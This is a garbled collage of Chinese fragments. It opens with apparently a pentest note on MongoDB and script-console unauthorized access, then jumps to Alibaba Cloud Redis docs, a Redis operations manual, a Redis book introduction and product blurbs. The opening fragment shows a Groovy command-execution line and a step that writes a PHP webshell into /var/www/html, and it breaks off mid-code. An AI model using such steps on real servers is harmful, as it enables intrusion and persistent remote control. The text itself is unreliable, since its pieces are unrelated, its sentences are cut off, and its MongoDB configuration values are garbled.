地址：https://svn.nmap.org/nmap/scripts/redis-info.nse MongoDB 未授权访问漏洞 漏洞简介以及危害 开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需 密码对数据库任意操作（增、删、改、查高危动作）而且可以远程访问数据库。 造成未授权访问的根本原因就在于启动 Mongodb 的时候未设置 uth参数、为MongoDB添加用户 -MongoDB 自身带有一个HTTP服务和并支持REST接口。在2.6以后这些接口默认是关闭的。mongoDB 默认会使用默认端口监听web服务，一般不需要通过web方式进行远程管理，建议禁用。修改配置文件 或在启动的时候选择 –nohttpinterface 参数 nohttpinterface=false -启动时加入参数--bind_ip 168.18.129:8080/ 如下图所示说明环境搭建成功 点击“脚本命令执行” 执行系统命令 网站路径：/var/www/html （需要具备一定的权限） 利用“脚本命令行”写webshell，点击运行没有报错,写入成功 println "whoami".execute().text new File ("/var/www/html/shell.php").write('<

的每秒操作次数。 CpuUsage 当前 Redis 后端的 CPU 使用率。 云数据库 Redis 版 快速入门 4 参数设置 您可以在参数设置页面对 Redis 的常见参数进行设置，比如淘汰策略及 notify-keypsace-events 等。详细操 作请参见参数设置。 备份恢复 您可以在备份恢复页面进行备份的设置和克隆实例，另外可以设置自动备份的时间。详细操作请参见备份与恢 版仅支持阿里云内网访问，不支持外网访问，即只有在同节点的 ECS 上安装 Redis-cli 才能与 云数据库建立连接并进行数据操作。 说明：Redis-cli 是 Redis 原生的命令行工具，可以先下载安装 Redis 即可使用 Redis-cli。在 ECS 上安 装 Redis 的命令请参考 Redis 官方网页。 Redis-cli 连接云数据库 Redis 版的命令如下：

Redis操作手册 前言： 1.蓝色字体表示命令行命令，正式执行时不要复制前面的#号，#号只是提示应 该使用root权限操作 2.绿色字体表示注释，有时注释太多就不用绿色表示了 3.注意：本文档的所有操作请先在测试机里进行实践，请不要直接在真实的服 务器中操作！ 版权声明： 本文档以开源的形式发布，所有条款如下： （1）无担保：作者不保证文档内容的准确无误，亦不承担由于使用此文档所导致的任何后果 start redis # systemctl status redis ★redis使用ssl ★redis-cli客户端工具 ★命令行客户端 在redis服务端安装目录下有redis-cli命令行工具 安装目录下# redis-cli -h 10.99.1.51 -p 6379 -a Centos123 #-h指定服务器地 址， # -p指定端口，-a指定密码

——如果你对此有所担⼼的话， 那么现在可以打消你的疑虑了！ Redis API 遵循的是 UNIX “⼀次只 做⼀件事，并把它做好”的设计哲学， Redis 的 API 虽然丰富， 但它们⼤部分都⾮常简短， 并且只需接受 ⼏个参数就可以完成⽤户指定的操作。 更棒的是， Redis 在官⽅⽹站（redis.io）上为每个 API 以及相关特 性都提供了详尽的⽂档， 并且客户端本身也可以在线查询这些⽂档。 当你遇到⽂档⽆法解决的问题时， Redis 命令都⾮常简单， 只需要接受少量⼏个参数就可以完成⾮常强⼤的操作。 Redis 的所有命令都由⼀个命令名后跟任意多个参数以及可选项组成： COMMAND [arg1 arg2 arg3 ...] [[OPTION1 value1] [OPTION2 value2] [...]] 在本书中， 命令和可选项的名字通常以⼤写字⺟形式出现， ⽽命令参数和可选项的值则以⼩写字⺟形式出现。 ⽐ 如上例中的 OPTION2 则是可选项的名字。 ⾄于 arg1 、 arg2 和 arg3 则 是命令的参数， ⽽ value1 和 value2 则是可选项的值。 命令描述中的⽅括号 [] 仅⽤于包围命令中可选的参数和选项， 在执⾏命令的时候并不需要给出这些⽅括号。 最 后， 命令描述中的 ... ⽤于表示命令接受任意数量的参数或可选项。 好的， 关于 Redis 命令格式的描述已经⾜够多了， 现在让我们来看⼀个实际的例⼦。

会先删除已经存在的 newkey，这也会引发 上面提到的删除大 key 问题。如果想让 redis 在这种场景下也使用 lazyfree 的方式来删除，您可以在控制台上 打开如下配置： 说明：该参数配置在控制台中暂未开放，后续我们会尽快发布。 淘汰或者逐出数据 有些用户对数据设置过期时间，依赖 Redis 的淘汰机制去删除已经过期的数据，这同样也存在上面提到的问题 ：淘汰某个大 可视化 DMS 平台 专业的 DMS 数据管理平台，提供可视化的数据管理，全面提升研发、运维效率。 数据库内核版本管理 主动升级，快速修复缺陷，免去日常版本管理苦恼；优化 Redis 参数配置，最大化利用系统资源。 产品优势 性能卓越 集群功能可支持超大容量，超高性能。支持集群功能，提供128 GB 及以上集群实例规格，可满足大 容量和高性能需求。